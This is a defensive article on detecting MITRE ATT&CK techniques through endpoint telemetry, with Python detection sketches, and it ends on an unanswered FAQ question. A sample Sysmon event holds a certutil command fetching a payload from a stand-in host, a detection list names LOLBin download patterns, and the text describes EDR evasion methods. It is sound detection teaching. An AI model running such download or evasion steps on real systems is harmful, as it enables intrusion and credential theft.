Writing a detection rule for T1003.001 (LSASS credential dumping) that fires on Sysmon Event ID 10 when a process requests PROCESS_VM_READ access to lsass.exe is table stakes detection. The adversary who studies your defensive tooling — and sophisticated actors do — will route around it using indirect syscalls that bypass user-mode hooks, using kernel-mode drivers that operate below the Sysmon layer, or using legitimate utilities like Task Manager or Windows Error Reporting that have historically been allowlisted. Detection resilience means designing rules with explicit analysis of which evasion paths are available for the technique, and adding secondary detections for those paths. For LSASS dumping specifically: monitoring for anomalous handle requests in kernel telemetry via EDR drivers, detecting the use of MiniDumpWriteDump via API call tracing, flagging lsass.exe memory access from processes with anomalous parent-child relationships, and monitoring for the downstream artifact — the dump file itself appearing in unexpected filesystem locations — provides overlapping coverage that requires the adversary to defeat multiple independent detection paths simultaneously. Single-path detection logic fails against a single evasion technique. Layered detection logic forces adversaries to achieve a much harder simultaneous bypass condition.

Telemetry Architecture for Cross-Tactic Kill Chain Detection

Many organizations build detection logic at the technique level — a rule for T1059.001, a rule for T1003.001, a rule for T1021.002. These rules catch individual technique instances. What they do not catch is a sequence of individually non-alerting behaviors that, in aggregate, constitute a complete intrusion. An adversary who uses a legitimate administrative tool for remote execution, accesses a non-sensitive file share for discovery, and requests Kerberos tickets for services that are technically within their access scope may not trip any individual technique rule — while executing a textbook lateral movement campaign. Cross-tactic kill chain detection requires that endpoint telemetry be stored in a queryable format with consistent entity identifiers — process GUIDs, account SIDs, host identifiers — that allow analysts to reconstruct the complete sequence of events across a dwell period. Platforms like Microsoft Sentinel's UEBA (User and Entity Behavior Analytics) engine, Elastic Security's correlation rules with sequence matching, and Splunk's Transaction command all provide primitives for this. But they require that telemetry from EDR, identity, and network sources share common entity identifiers that survive normalization — a pipeline design decision that is far upstream of rule writing. Organizations that design their telemetry pipelines for single-event detection will find that their SIEM cannot answer the question: "What did this account do across all endpoints between Day 0 and Day 30?" That question is the one that matters during incident response.
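The query that matters during incident response depends entirely on the entity key surviving normalization. A minimal sketch with illustrative events; the operative design decision is the shared account SID across EDR, identity, and network sources:

```python
# Reconstructing one account's activity across hosts via a shared entity key.
events = [
    {"sid": "S-1-5-21-1001", "host": "ws01", "ts": 100, "action": "logon"},
    {"sid": "S-1-5-21-9999", "host": "ws07", "ts": 150, "action": "logon"},
    {"sid": "S-1-5-21-1001", "host": "fs02", "ts": 240, "action": "smb_file_read"},
    {"sid": "S-1-5-21-1001", "host": "dc01", "ts": 300, "action": "kerberos_tgs_request"},
]

def timeline_for(sid: str, events: list) -> list:
    """Answer: what did this account do, across all endpoints, in order?"""
    return sorted((e for e in events if e["sid"] == sid), key=lambda e: e["ts"])

trail = timeline_for("S-1-5-21-1001", events)
print([(e["host"], e["action"]) for e in trail])
```

Each event in the trail may be individually benign; the sequence (logon, file share read, service ticket request, across three hosts) is the kill chain. If the pipeline had stripped or rewritten the SID differently per source, this query would return fragments instead of a trail.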

Instrumenting the Detection Infrastructure Itself

T1562.001 (Impair Defenses: Disable or Modify Tools) is reliably present in sophisticated intrusion campaigns because defenders rarely monitor the health of their own monitoring. An adversary who kills the EDR agent on a target host before executing credential dumping has, in effect, performed a targeted telemetry blackout. The standard recommendation to "monitor for agent heartbeat" misses a more operationally robust approach: treating telemetry volume itself as a behavioral baseline. Every instrumented endpoint in an enterprise produces a statistically predictable volume of process creation, network, and registry events over any given time window. An endpoint that drops from 10,000 events per hour to zero — without a corresponding system shutdown event — is not silent because nothing happened. It is silent because something was done to make it silent. SIEM-level alerting on per-endpoint telemetry volume anomalies, combined with tamper-protection enforcement on EDR agents and Group Policy auditing for Script Block Logging configuration changes, turns the detection infrastructure into a monitored surface rather than a trusted assumption. The organizations that discovered Salt Typhoon's presence in carrier networks did so partly because anomalous telemetry behavior on specific infrastructure pointed to collection impairment before any technique-specific alert fired.
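Treating telemetry volume as a behavioral baseline reduces to an anomaly test over per-endpoint event counts. A minimal sketch (the z-score threshold and the shutdown_seen correlation flag are illustrative choices, not a tuned production detector):

```python
import statistics

def volume_blackout_suspect(hourly_counts: list[int], current: int,
                            shutdown_seen: bool) -> bool:
    """An endpoint whose event volume collapses far below its own baseline,
    with no corresponding shutdown event, may have a tampered sensor (T1562.001)."""
    mean = statistics.mean(hourly_counts)
    stdev = statistics.pstdev(hourly_counts) or 1.0  # guard a flat baseline
    zscore = (current - mean) / stdev
    return zscore < -3 and not shutdown_seen

baseline = [9800, 10100, 10050, 9900, 10200, 9950]  # events/hour for one endpoint
print(volume_blackout_suspect(baseline, current=0, shutdown_seen=False))    # True
print(volume_blackout_suspect(baseline, current=9700, shutdown_seen=False)) # False
```

The alert logic says nothing about any technique; it only says the sensor went quiet in a way the host's own history cannot explain, which is precisely the signal technique-specific rules cannot provide once the agent is dead.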

What ATT&CK v18 Changes for Telemetry-Driven Detection

The October 2025 release of ATT&CK v18 introduced the most significant structural change to the framework's detection guidance since its public launch. Traditional "Detections" sections — which paired techniques with one or two sentences pointing to a data source — have been fully deprecated and replaced by two new structured objects: Detection Strategies and Analytics. This is not cosmetic. It fundamentally changes how the relationship between endpoint telemetry and ATT&CK technique detection is expressed.

Detection Strategies define the high-level behavioral approach to detecting a technique. They describe what an adversary's activity looks like in terms of observable system behavior, independent of any specific SIEM or EDR platform. Analytics sit below Detection Strategies and provide platform-specific, actionable detection logic — explicitly referencing log sources, data components, and the telemetry channels that produce the signals the analytic operates on. Critically, v18 added over 1,700 analytics across the Enterprise matrix, each structured with direct links to the telemetry components that feed them. For defenders, this means the framework now closes a gap it previously left open: you no longer have to infer the path from "collect this log source" to "here is how to write a detection." ATT&CK v18 makes that path explicit.

The v18 Shift in Practice

Before v18, ATT&CK T1082 (System Information Discovery) pointed defenders to "Command Execution" and "Process Creation" as data sources. After v18, the technique maps to a Detection Strategy (DET0525) and an Analytic (AN0850) that explicitly link to Data Components DC0009, DC0017, and DC0025 — specifying which fields, which platforms, and which log sources produce the relevant signals. The gap between "what to collect" and "how to detect" is now part of the framework itself.

Before v18
T1082 — System Information Discovery

Detection guidance in the technique entry consisted of one or two sentences:

Detection guidance instructed defenders to monitor executed commands and arguments for OS/hardware enumeration, and to watch processes and command-line arguments for system and network information gathering. (Paraphrased from pre-v18 T1082 detection notes, MITRE ATT&CK)

Data sources listed: Command, Process, OS API

Implementation gap: what to query, which fields, which platforms — left entirely to the defender.

After v18
T1082 — System Information Discovery

Detection Strategy DET0525 maps behavioral approach. Analytic AN0850 specifies:

  • Data Component DC0009 — Command Execution (OS & platform)
  • Data Component DC0017 — Process Creation (fields: Image, CommandLine, User)
  • Data Component DC0025 — OS API Execution (NtQuerySystemInformation)
  • Platform-specific log sources listed explicitly per Windows, Linux, macOS
  • Sigma-compatible pseudocode for query construction included

Implementation gap: closed. The path from telemetry collection to detection logic is now part of the framework.
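The strategy-to-component chain above lends itself to machine-checkable gap analysis. The sketch below reuses the IDs cited in this section (DET0525, AN0850, DC0009/DC0017/DC0025); representing them as a dictionary and diffing against the components your pipeline actually produces is the illustrative part, not an official MITRE data format:

```python
# v18 analytic metadata for T1082, as cited above. In practice this would be
# loaded from the ATT&CK STIX bundle rather than hand-written.
ANALYTICS = {
    "T1082": {
        "strategy": "DET0525",
        "analytic": "AN0850",
        "data_components": {"DC0009", "DC0017", "DC0025"},
    },
}

def coverage_gap(entry, operational_components):
    """Return the data components an analytic requires that the telemetry
    pipeline does not yet produce."""
    return entry["data_components"] - operational_components

# A pipeline with command execution and process creation online, but no
# OS API execution telemetry:
missing = coverage_gap(ANALYTICS["T1082"], {"DC0009", "DC0017"})
```

Run across the full analytics library, this kind of diff is exactly the "gap checklist" usage the framework now enables.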

The v18 release also expanded the Enterprise matrix's platform scope to include ESXi, reflecting the documented rise in adversary targeting of VMware hypervisor infrastructure in ransomware and persistent access campaigns. This matters for endpoint telemetry architects because ESXi hosts present a fundamentally different instrumentation challenge than Windows or Linux workloads. The hypervisor layer sits below the guest operating systems, meaning EDR agents deployed inside virtual machines do not see host-level activity. Defending ESXi environments requires hypervisor-native telemetry through ESXi audit logs, vSphere events, and where available, agentless behavioral monitoring — a capability gap that v18 now explicitly documents through its new ESXi-specific technique entries.

Detection Strategies also connect behaviors across tactics in a way the older single-sentence detection notes could not. An adversary who uses Execution techniques (TA0002) to run a scheduled task is often simultaneously establishing Persistence (TA0003) through the same action. v18 Detection Strategies reflect this, enabling defenders to trace detection logic across tactical boundaries — which is how adversary behavior in real intrusions actually works. The implication for telemetry architecture is that cross-tactic detection requires telemetry that preserves temporal and causal context across the event stream, not just high-volume event collection.

How to Map Endpoint Telemetry to ATT&CK: A Prioritized Starting Sequence

The coverage gap documented by CardinalOps is an engineering and process failure, not an infrastructure one. The organizations that close it fastest work from a specific, sequenced collection roadmap rather than deploying broadly and hoping for coverage. Here is a defensible starting sequence for aligning endpoint telemetry collection with ATT&CK v18 detection requirements.

  1. Enable process creation telemetry with full command-line arguments. Configure Windows Audit Process Creation alongside Sysmon Event ID 1. This single data source covers more ATT&CK techniques than any other — execution, persistence, privilege escalation, and defense evasion all produce process creation events. Command-line argument auditing is the non-negotiable component: without it, you see that a process ran, not what it did.
  2. Enable PowerShell Script Block Logging (Event ID 4104). Configure this via Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell. Without it, T1059.001 detection is incomplete — you see powershell.exe executing but cannot examine what script it ran. This is one of the highest-frequency gaps in enterprise environments.
  3. Deploy process access telemetry via Sysmon Event ID 10. This event fires when one process opens a handle to another with specific access rights. A process requesting PROCESS_VM_READ access to lsass.exe is the primary detection signal for credential dumping under T1003.001 — and it fires regardless of which tool is used, making it living-off-the-land resistant.
  4. Instrument domain controllers with authentication and directory service telemetry. Windows Security Event ID 4769 (Kerberos Service Ticket requests) is required for detecting Kerberoasting under T1558.003. Directory Service Change events (Event IDs 4742 and 5137) are required for DCShadow detection under T1207. These events must be collected from domain controllers specifically — workstation telemetry will not substitute.
  5. Map your current collection to ATT&CK v18 Analytics. Use the ATT&CK Data Sources page and the v18 Analytics library to identify which data components each high-priority technique requires. Each analytic specifies the exact log sources and telemetry fields that must be operational — use this as a gap checklist, not just a reference document.
  6. Run ATT&CK coverage gap analysis in Navigator with threat actor overlays. Load the threat actor profiles for adversary groups relevant to your sector into MITRE ATT&CK Navigator. Overlay your current detection coverage layer against those profiles. The intersection of "techniques this actor uses" and "techniques you do not currently detect" is your prioritized closure list — shorter and operationally sharper than a generic ATT&CK coverage percentage.
  7. Validate detection rules with synthetic telemetry using Atomic Red Team. Run Atomic Red Team tests against your production telemetry pipeline on a scheduled basis. This produces a live measurement of which ATT&CK techniques your detection rules actually detect — not which ones you have rules for on paper. The CardinalOps finding that 13% of SIEM rules are non-functional reflects exactly the gap this step closes.
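As a concrete illustration of step 1, a Sysmon Event ID 1 (process creation) record can be parsed into the fields detection logic operates on. The field names (`Image`, `CommandLine`, `ParentImage`) match the Sysmon schema, but the sample event and its values are synthetic:

```python
import xml.etree.ElementTree as ET

# Minimal synthetic Sysmon Event ID 1 record in Windows event XML form.
SAMPLE = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\certutil.exe</Data>
    <Data Name="CommandLine">certutil.exe -urlcache -split -f http://example.test/p.bin</Data>
    <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data>
  </EventData>
</Event>"""

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def parse_process_creation(xml_text):
    """Extract EventData fields from a Sysmon Event ID 1 record, or None
    if the record is a different event type."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "1":
        return None
    return {d.get("Name"): d.text for d in root.findall("e:EventData/e:Data", NS)}

evt = parse_process_creation(SAMPLE)
```

Note that the detection value lives almost entirely in `CommandLine` — which is why the list above calls command-line argument auditing non-negotiable.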

Threat Hunting as Telemetry Interrogation

Automated detection logic — whether EDR behavioral rules or SIEM correlation rules — operates on known patterns. Threat hunting is the practice of proactively interrogating endpoint telemetry to find evidence of adversary activity that automated detections missed. ATT&CK provides the hypothesis framework: a hunter starts with a technique, identifies the telemetry sources it produces, and queries that telemetry for anomalies that fall below automated alert thresholds. For a structured look at how adversaries sequence these techniques end to end, see attacker playbooks — the same TTP chains that give hunters their starting hypotheses.

The PEAK Threat Hunting Framework, published by Splunk's security research team in 2023, formalizes this process into three hunt types: Hypothesis-Driven (starting from ATT&CK technique hypotheses), Baseline (establishing normal behavior profiles to surface anomalies), and Intel-Driven (starting from threat intelligence about specific adversary TTPs). In all three types, endpoint telemetry is the raw material being interrogated. The hypothesis for a Kerberoasting hunt (T1558.003) might be: "Are there endpoints on which service ticket requests for high-privilege accounts are being made by processes that do not normally request Kerberos tickets?" That question can only be answered if Kerberos ticket request telemetry — Windows Security Event ID 4769 — is being collected at high fidelity from domain controllers and is accessible to the hunter through a queryable platform.
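The 4769-based hunt hypothesis above can be expressed as a query sketch. The field names (`TargetUserName`, `ServiceName`, `TicketEncryptionType`) come from the Event ID 4769 schema; the RC4-only filter (`0x17`) and the SPN-count threshold are illustrative hunt parameters that a real hunt would derive from an environment baseline:

```python
def kerberoast_candidates(events, spn_threshold=3):
    """Flag accounts requesting RC4-encrypted service tickets for unusually
    many distinct SPNs in the window -- the bulk-Kerberoasting pattern."""
    RC4 = "0x17"
    per_account = {}
    for e in events:
        if e["TicketEncryptionType"] != RC4:
            continue
        per_account.setdefault(e["TargetUserName"], set()).add(e["ServiceName"])
    return sorted(a for a, spns in per_account.items() if len(spns) >= spn_threshold)

# Synthetic 4769 records: one account sweeping three SPNs with RC4 tickets,
# one service making a routine AES-encrypted request.
events_4769 = [
    {"TargetUserName": "jdoe", "ServiceName": "svc_sql",    "TicketEncryptionType": "0x17"},
    {"TargetUserName": "jdoe", "ServiceName": "svc_web",    "TicketEncryptionType": "0x17"},
    {"TargetUserName": "jdoe", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "websrv", "ServiceName": "svc_web",  "TicketEncryptionType": "0x12"},
]
candidates = kerberoast_candidates(events_4769)
```

The sketch only works if 4769 events are collected from domain controllers at full fidelity — the collection prerequisite the paragraph above describes.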

The PEAK Threat Hunting Framework characterizes effective hunting as fundamentally a telemetry discipline. Hunters who understand exactly which signals each adversary technique generates — and who can construct precise queries against that telemetry — are positioned to find attackers before objectives are reached. — PEAK Threat Hunting Framework, Splunk Security Research, 2023

The practical discipline of threat hunting against ATT&CK techniques has also produced a significant body of publicly available hunting queries. The Elastic Detection Rules repository on GitHub, the Microsoft Sentinel community repository, and the Splunk Security Essentials app all contain ATT&CK-mapped hunting queries that analysts can use as starting points. Organizations at earlier stages of telemetry maturity can use these resources to understand what their current telemetry can and cannot answer — and to build a roadmap for closing coverage gaps.

Absence as Signal: The Counterintuitive Detection Primitive

If endpoint telemetry shows that a process executed but no child process was created, no network connection was initiated, and no file was written — that process almost certainly did something entirely in memory. The signal is not what happened. It is what did not happen alongside what did.

process created
no child process
no file write
no network connection
= probable in-memory execution

ATT&CK T1620 (Reflective Code Loading) and T1055 sub-techniques for process injection are specifically designed to leave minimal filesystem artifacts. Detecting them requires behavioral baselines defining what a process normally produces — so that an execution event producing nothing becomes the anomaly. This kind of detection is not an advanced SOC capability. It is the prerequisite for one.
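A minimal version of that absence check, assuming per-process artifact counts have already been aggregated from the telemetry stream (the record shape is an assumption for illustration — real detections compare against per-image baselines rather than raw zeros):

```python
def in_memory_suspects(process_records):
    """Flag processes that executed but produced no child processes, file
    writes, or network connections -- the T1620 / T1055 absence pattern."""
    return [pid for pid, r in process_records.items()
            if r["children"] == 0 and r["file_writes"] == 0 and r["net_conns"] == 0]

# Synthetic aggregates: pid-1002 ran and produced nothing downstream.
records = {
    "pid-1001": {"children": 2, "file_writes": 5, "net_conns": 1},
    "pid-1002": {"children": 0, "file_writes": 0, "net_conns": 0},
}
suspects = in_memory_suspects(records)
```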

How Adversaries Evade the Telemetry That Should Catch Them

ATT&CK coverage on paper does not mean an adversary will be caught. The framework describes what techniques produce detectable signals — but adversaries are aware of detection infrastructure and actively adapt to avoid tripping it. Understanding these adaptations is what separates detection programs that catch real intrusions from programs that perform well only in ATT&CK Evaluations scenarios.

Adversary Countermoves: When They Know You Are Collecting
1. Living-Off-the-Land (LOLBins)
Rather than dropping a custom binary that hashes to a known-malicious value, adversaries use legitimate system tools — certutil.exe, mshta.exe, regsvr32.exe, wmic.exe — to execute payloads. These processes are already present in your environment, run under trusted parent processes, and hash-based rules will not fire on them. They still produce process creation telemetry, but they require behavioral detection logic, not signature matching. This is why process creation with full command-line argument auditing is the non-negotiable baseline: the technique is in the command line, not the binary.
2. Sysmon Event ID 10 Evasion
LSASS credential dumping detection (T1003.001) relies on Sysmon Event ID 10 firing when a process requests PROCESS_VM_READ access to lsass.exe. Adversaries increasingly use indirect system calls — bypassing the standard Win32 API layer where Sysmon hooks — to open LSASS handles without triggering user-mode telemetry. Countering this requires kernel-level telemetry from EDR drivers that operate below the Sysmon hook layer, not just user-space sensors. Organizations that deploy only Sysmon without a commercial EDR have a meaningful blind spot here.
3. Timestomping and Metadata Manipulation
ATT&CK T1070.006 (Timestomp) covers adversary modification of file timestamps to make malicious files appear older than they are — defeating timeline-based forensic analysis. Process metadata anomalies are similarly manipulated: masquerading (T1036) involves renaming malicious executables to match trusted system binary names. Detection requires comparing process image path against expected system directories, not just binary names — a field-level check that many SIEM rules omit.
4. Telemetry Infrastructure as the Target
Sophisticated adversaries attack the observation layer itself. T1562.001 (Impair Defenses: Disable or Modify Tools) documents this directly — killing EDR processes, deleting Sysmon configurations, or modifying Group Policy to disable Script Block Logging. Once the telemetry pipeline is impaired, subsequent technique execution becomes invisible. This is why monitoring for telemetry health — agent heartbeat, log volume anomalies, Event ID 1102 (audit log cleared) — must be part of the detection program. A SIEM receiving suddenly reduced telemetry from a host is itself an indicator of compromise.
Operational implication: ATT&CK coverage percentages measure whether you have detection logic for a technique assuming the telemetry is functioning. They do not measure whether that logic will fire when an adversary has actively adapted their behavior. Detection engineering must account for the adversary's knowledge of defensive tooling — not just the technique taxonomy.
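The behavioral checks described in countermoves 1 and 3 — command-line patterns rather than hashes, and image-path validation rather than binary names — can be sketched as follows. The patterns and the expected-path table are illustrative stand-ins for curated rule content such as Sigma rules, not a complete detection set:

```python
import re

# Illustrative command-line patterns for common LOLBin abuse. Production
# coverage comes from maintained rule sets, not a three-entry list.
LOLBIN_PATTERNS = [
    (re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I), "certutil download"),
    (re.compile(r"regsvr32(\.exe)?\b.*/i:https?://", re.I), "regsvr32 remote scriptlet"),
    (re.compile(r"mshta(\.exe)?\b.*https?://", re.I), "mshta remote HTA"),
]

# Masquerading check: trusted binary names must run from their expected path.
EXPECTED_PATHS = {"svchost.exe": r"c:\windows\system32\svchost.exe"}

def check_event(image_path, command_line):
    """Return behavioral findings for one process creation event."""
    findings = [label for pattern, label in LOLBIN_PATTERNS
                if pattern.search(command_line)]
    name = image_path.lower().rsplit("\\", 1)[-1]
    expected = EXPECTED_PATHS.get(name)
    if expected and image_path.lower() != expected:
        findings.append("masquerading: " + name)
    return findings
```

Both checks operate on fields (image path, command line) that only exist if the baseline telemetry from the prioritized sequence earlier in this article is configured.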

Endpoint Telemetry in Cloud Workloads and Containers

The article so far has addressed telemetry in the context of traditional Windows, Linux, and macOS endpoints. But a growing share of enterprise infrastructure runs in cloud-native environments — ephemeral virtual machines, containerized workloads, and serverless functions — that behave differently from persistent endpoints in ways that create specific telemetry challenges against the ATT&CK matrix.

Cloud virtual machines running on AWS EC2, Azure Virtual Machines, or Google Compute Engine are, in principle, instrumentable with the same EDR agents and Sysmon-equivalent tooling as on-premises hosts. The challenge is operational: auto-scaling groups spin up and tear down instances without manual intervention, which means agent installation must be baked into machine images and telemetry pipelines must account for hosts that exist for minutes rather than months. ATT&CK techniques such as T1078 (Valid Accounts) are particularly common in cloud environments, but the signals they produce — authentication events from cloud identity providers like AWS IAM or Microsoft Entra ID — are not endpoint telemetry at all. They require cloud-native log sources (AWS CloudTrail, Azure Audit Logs) as a separate telemetry stream alongside endpoint agents on the instances themselves.

Containers present a more fundamental instrumentation challenge. A container shares the host kernel but does not expose the same event surfaces as a full operating system. A traditional EDR agent cannot be deployed inside a container image without significant overhead, and many container deployments are explicitly designed to be read-only and minimal. eBPF has emerged as the primary solution: eBPF-based sensors attached at the host kernel level observe all container activity — process creation, syscalls, network connections — without requiring an agent inside each container. MITRE has published ATT&CK for Containers coverage that maps techniques such as T1610 (Deploy Container) and T1611 (Escape to Host) to the specific telemetry sources relevant to containerized environments, including container orchestration audit logs from Kubernetes and host-level eBPF observations.

Ephemeral Workload Telemetry Gap

Telemetry from a container or short-lived cloud instance is only useful if it is streamed out to a persistent collection platform in real time. When a container terminates, any telemetry stored only in its local filesystem is gone. ATT&CK technique detection in cloud-native environments requires centralized telemetry pipelines that capture and retain events before the workload disappears.

The telemetry retention question also becomes acute in ephemeral environments. On a persistent workstation, EDR platforms typically buffer telemetry locally and forward to the SIEM continuously. On a container that lives for forty seconds, buffered-but-not-forwarded telemetry is permanently lost when the container exits. This forces organizations to design telemetry architectures where streaming export is a first-class requirement — not an afterthought — and to explicitly map ATT&CK technique detection requirements to the telemetry sources available in their specific hosting model before gaps appear during an incident.

Frequently Asked Questions

What is endpoint telemetry in cybersecurity?

Endpoint telemetry is the continuous stream of behavioral and state-change data produced by operating systems, security agents, and instrumented applications on individual hosts. It captures process creation with full command-line arguments, file system operations, registry modifications, network connections tied to specific processes, authentication events, and inter-process communication. Unlike traditional logging — which captures discrete events written explicitly to a log file — endpoint telemetry includes continuous sensor data from kernel-level hooks and in-memory observations. That distinction matters because living-off-the-land techniques are specifically designed to avoid producing log entries; telemetry coverage is what makes those techniques detectable.

How does MITRE ATT&CK use endpoint telemetry for detection?

Every technique in the MITRE ATT&CK Enterprise matrix maps to specific endpoint telemetry sources through the ATT&CK Data Sources taxonomy. Each technique entry prescribes which data source components — such as Process Creation, Network Connection Creation, or Registry Key Modification — produce detectable signals for that technique. ATT&CK v18 (October 2025) went further by replacing general detection notes with structured Detection Strategies and over 1,700 Analytics that explicitly link telemetry components to actionable detection logic. This makes ATT&CK function simultaneously as a threat catalog and a sensor requirements document: the framework now closes the implementation gap between "what telemetry to collect" and "how to write a detection against it."

What changed in ATT&CK v18 for defenders?

ATT&CK v18, released in October 2025, replaced the old single-sentence detection notes with two new structured objects: Detection Strategies and Analytics. Detection Strategies define the high-level behavioral approach to detecting a technique, independent of any specific platform. Analytics provide platform-specific, actionable detection logic with explicit references to the telemetry data components and log sources that feed them — over 1,700 analytics added across the Enterprise matrix. The v18 release also expanded platform coverage to include ESXi, reflecting documented adversary targeting of VMware hypervisor infrastructure in ransomware and persistent access campaigns. For telemetry architects, this creates a new instrumentation requirement: EDR agents inside virtual machines do not see host-level hypervisor activity, requiring native ESXi audit log collection as a separate telemetry stream.

Why do enterprise SIEMs miss most ATT&CK techniques?

CardinalOps' Fifth Annual State of SIEM Detection Risk Report (June 2025) — the largest such study ever conducted, drawing from 2.5 million total log sources and over 13,000 unique detection rules across Splunk, Microsoft Sentinel, IBM QRadar, CrowdStrike Logscale, and Google SecOps — found that enterprise SIEMs have detection logic for only 21 percent of ATT&CK techniques used by adversaries. The gap is not primarily a data availability problem: those SIEMs were already ingesting sufficient telemetry to potentially cover more than 90 percent of techniques. The causes are detection engineering gaps (telemetry collected but no rule written against it), misconfigured data sources, and approximately 13 percent of existing rules being non-functional due to missing log fields.

What is the difference between EDR and SIEM for ATT&CK coverage?

EDR and SIEM serve complementary roles in an ATT&CK-aligned detection program. EDR is the collection and real-time analysis layer: it ingests raw endpoint telemetry at high volume, tracks parent-child process relationships, and applies behavioral detections on the host in real time. SIEM is the correlation and investigation layer: it aggregates telemetry from EDR alongside identity, network, and cloud sources and applies detection logic that spans multiple data sources and extended time windows. Neither replaces the other. An EDR alert indicating a credential dumping attempt is only contextualizable as part of a broader campaign when the SIEM correlates it with identity anomalies, lateral movement indicators, and cloud API access patterns — data that crosses source boundaries no individual EDR sensor can see.

What is Sysmon and why does it matter for ATT&CK detection?

Sysmon is a free Microsoft Sysinternals tool that exposes Windows kernel telemetry as structured XML events consumable by SIEM platforms. Key event IDs for ATT&CK coverage include Event ID 1 (process creation with hash and command-line), Event ID 3 (network connections per process), Event ID 10 (process access — the primary signal for detecting LSASS credential dumping under T1003.001), and Event ID 25 (process tampering for detecting injection and hollowing techniques under T1055). As of late 2025, Microsoft has announced that Sysmon functionality will be delivered as a native optional Windows feature via Windows Update — removing the manual per-endpoint deployment burden that has historically produced inconsistent Sysmon coverage across enterprise fleets.

How does threat hunting use ATT&CK and endpoint telemetry?

Threat hunting is the proactive interrogation of endpoint telemetry to find adversary activity that automated detections missed. ATT&CK provides the hypothesis framework: a hunter starts with a technique, identifies the telemetry sources it produces, and queries for anomalies below automated alert thresholds. The PEAK Threat Hunting Framework formalizes this into three hunt types: Hypothesis-Driven (starting from ATT&CK technique hypotheses), Baseline (establishing normal behavior profiles to surface anomalies), and Intel-Driven (starting from threat intelligence about specific adversary TTPs). In all three types, endpoint telemetry is the raw material. An underappreciated dimension is the value of absence: if a process executed but produced no child process, no network connection, and no file write, that pattern — detectable only through comprehensive telemetry baselines — points to in-memory execution techniques like T1620 (Reflective Code Loading).

Which ATT&CK tactics are hardest to detect with endpoint telemetry?

Reconnaissance (TA0043) and Resource Development (TA0042) are hardest because they occur before the adversary touches the victim infrastructure — the activity is external and produces no endpoint artifacts until tool delivery. Defense Evasion (TA0005) presents a different challenge: it contains the largest number of techniques in the Enterprise matrix, and many sub-techniques directly target the telemetry collection infrastructure itself — killing EDR agents, clearing event logs, or masquerading as legitimate processes. Detection here depends on telemetry that captures what was removed or altered, requiring baselining and alerting on absence as well as presence of events.

What endpoint telemetry should organizations prioritize collecting first?

The most operationally defensible approach is to align collection priorities with ATT&CK technique frequency in threat intelligence relevant to your sector. That said, there is a practical starting sequence that holds across most enterprise environments. Process creation with full command-line arguments — enabled through Windows Audit Process Creation and supplemented by Sysmon Event ID 1 — covers more ATT&CK techniques per data source than any other single telemetry type and should be the first configuration priority. PowerShell Script Block Logging (Event ID 4104) comes next because it is commonly disabled by default and covers the most-abused execution technique in the ATT&CK matrix. Process access telemetry from Sysmon Event ID 10 addresses credential dumping across T1003 sub-techniques. Network connection events tied to specific processes — not just IP flow records — close the lateral movement detection gap. From there, Authentication and Directory Service events on domain controllers address the highest-value ATT&CK techniques in the Credential Access and Persistence tactics. Organizations should use the ATT&CK Data Sources page and the ATT&CK v18 Analytics as a prioritization matrix: each analytic identifies exactly which data components are required, making it possible to rank missing telemetry by the number of high-frequency ATT&CK techniques that depend on it.

How long should endpoint telemetry be retained for ATT&CK-aligned detection?

Retention requirements for endpoint telemetry are driven by dwell time — the gap between initial compromise and detection. Industry reporting consistently shows median dwell times in breached organizations ranging from weeks to months. The implication is that a 30-day hot retention window in the SIEM, which is common in organizations managing storage costs, will contain no telemetry from the initial intrusion phase when detection finally occurs.

Why a 30-Day Hot Window Fails: Dwell Time vs. Retention Window

(Timeline: initial intrusion at Day 0; dwell and lateral movement through Day 30 and beyond; detection at Day 60–90+; a 30-day hot retention window covers only the most recent slice of that span.)
Day 0: Initial compromise — phishing email opened, payload executed, C2 established. This telemetry is the forensic ground truth for the intrusion.
Days 1–60+: Adversary moves laterally, escalates privileges, establishes persistence, stages data. Median enterprise dwell time in reported breaches exceeds 30 days.
Detection event: Alert fires — ransomware staging, unusual exfiltration, or an EDR behavioral rule trips. Investigation begins.
The gap: With a 30-day hot window, the initial intrusion telemetry has already been purged by the time detection occurs. Incident responders cannot reconstruct the initial access vector, the patient-zero endpoint, or the credential path used for lateral movement. The investigation starts in the middle of the story, not the beginning.

CISA's Cybersecurity Performance Goals recommend retaining logs for at least 12 months with three months immediately accessible for active analysis. For ATT&CK alignment specifically: techniques such as T1078 (Valid Accounts) rely on behavioral baselines that require weeks of normal activity to establish. Detecting Kerberoasting anomalies under T1558.003 requires comparing current ticket request patterns against historical baselines that only exist if telemetry has been retained long enough to establish them. The practical architecture for most organizations is tiered: 30 to 90 days of high-fidelity raw telemetry in a hot query tier, and 12 months of compressed or summarized telemetry in a cold archive accessible for retrospective investigation. The specific retention period for raw process creation events will differ from what is required for authentication events, which tend to be lower volume and higher signal density — and retention policy should reflect those differences rather than applying a single uniform window across all telemetry types.

Can endpoint telemetry detect insider threats and fileless attacks?

Yes to both, with important nuances. Fileless attacks — adversary techniques designed to execute entirely in memory without writing persistent artifacts to disk — are well represented in ATT&CK under T1620 (Reflective Code Loading), T1055 sub-techniques for process injection, and T1059 sub-techniques for scripting engine abuse. The key is that fileless does not mean telemetry-less. Reflective loading produces OS API execution telemetry. Process injection produces process access events (Sysmon Event ID 10) and process tampering events (Sysmon Event ID 25). PowerShell-based fileless execution produces Script Block Logging events. The common failure mode is organizations that have these telemetry sources available but have not written detection logic against them — exactly the gap the CardinalOps research quantified.

For insider threats, endpoint telemetry surfaces behavioral anomalies that signature-based tools cannot: a legitimate user account accessing file shares they have never accessed before, staging data in unusual directories before transfer, or running reconnaissance commands that are technically authorized but behaviorally abnormal. ATT&CK does not have a dedicated Insider Threat tactic, but techniques like T1078 (Valid Accounts), T1074 (Data Staged), T1567 (Exfiltration Over Web Service), and T1213 (Data from Information Repositories) are the primary ATT&CK entries that map to insider threat behavior — and all are detectable through endpoint and identity telemetry when behavioral baselines are established.

Does endpoint telemetry work the same way in cloud workloads and containers?

